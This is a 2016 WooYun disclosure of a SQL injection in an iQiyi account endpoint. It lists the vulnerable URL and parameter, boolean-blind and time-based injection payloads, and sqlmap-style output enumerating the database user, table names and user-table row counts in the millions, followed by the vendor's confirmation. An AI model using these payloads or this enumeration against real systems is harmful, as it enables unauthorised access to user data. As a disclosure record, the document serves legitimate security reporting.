当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190648

漏洞标题:爱奇艺某站SQL注入(一千五百万数据)

相关厂商:奇艺

漏洞作者: Blcat

提交时间:2016-03-30 10:57

修复时间:2016-05-14 11:40

公开时间:2016-05-14 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

我只是想缓存个电影出去玩的时候看
结果吓死本宝宝了

详细说明:

http://account.iqiyi.com/services/account/info.action?version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6&mix=1&testMode=0


platform_code可以注入

---
Parameter: platform_code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND 2143=2143 AND ('LHks'='LHks&mix=1&testMode=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND SLEEP(5) AND ('xGQD'='xGQD&mix=1&testMode=0
---

漏洞证明:

先跑个user

database management system users [1]:
[*] 'qiyiaccount'@'10.11.%'


再来个database

Database: qiyi_account
[54 tables]
+---------------------------------+
| acc_auth_authority_resource     |
| account_abnormal                |
| account_account                 |
| account_account_ext             |
| account_account_sub             |
| account_account_sub_debug       |
| account_appstore_recharge_count |
| account_async_task              |
| account_async_task_processed    |
| account_audit                   |
| account_auth_authority          |
| account_auth_resource           |
| account_auth_role               |
| account_auth_role_authority     |
| account_auth_user               |
| account_auth_user_authority     |
| account_auth_user_role          |
| account_auto_renew              |
| account_bi_uid                  |
| account_cash_coupon             |
| account_cash_coupon_send        |
| account_dict                    |
| account_dut_bind_log            |
| account_dut_pay_type            |
| account_dut_renew_log           |
| account_dut_type                |
| account_dut_user                |
| account_exception_order         |
| account_lock                    |
| account_log_operator            |
| account_notify_log              |
| account_order                   |
| account_recharge_access         |
| account_recharge_access_channel |
| account_recharge_access_qd      |
| account_recharge_channel        |
| account_recharge_coins          |
| account_recharge_platform       |
| account_recharge_qd             |
| account_recharge_rule           |
| account_refund_order            |
| account_security                |
| account_security_level          |
| account_security_message        |
| account_settlement              |
| account_split_coupon_user       |
| account_sub_platform            |
| account_sub_types               |
| account_test_user               |
| account_third_order             |
| account_tracker_code            |
| account_uid_change              |
| account_wechat_info             |
| boss_test_user                  |
+---------------------------------+


随便翻了几个表

Database: qiyi_account
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| account_security | 624597  |
+------------------+---------+
Database: qiyi_account
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| account_dut_user | 15509726 |
+------------------+---------+

修复方案:

估计是拼接sql语句了吧
改代码吧

版权声明:转载请注明来源 Blcat@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-03-30 11:36

厂商回复:

感谢白帽子的报告,经业务方确认,报告中提到的用户数据已做脱敏处理(泄漏了用户名、邮箱、手机号中间4位加*),此处不涉及到用户密码。 感谢关注爱奇艺PPS安全,我们已着手修复。

最新状态:

2016-03-30:谢谢 @Blcat 的报告,这份报告中提及的1500万数据是第三方同步给爱奇艺的(我们同样有责任和义务保护好这部分数据),库中爱奇艺自身账户体系中的数据是80万。 感谢关注爱奇艺安全 :)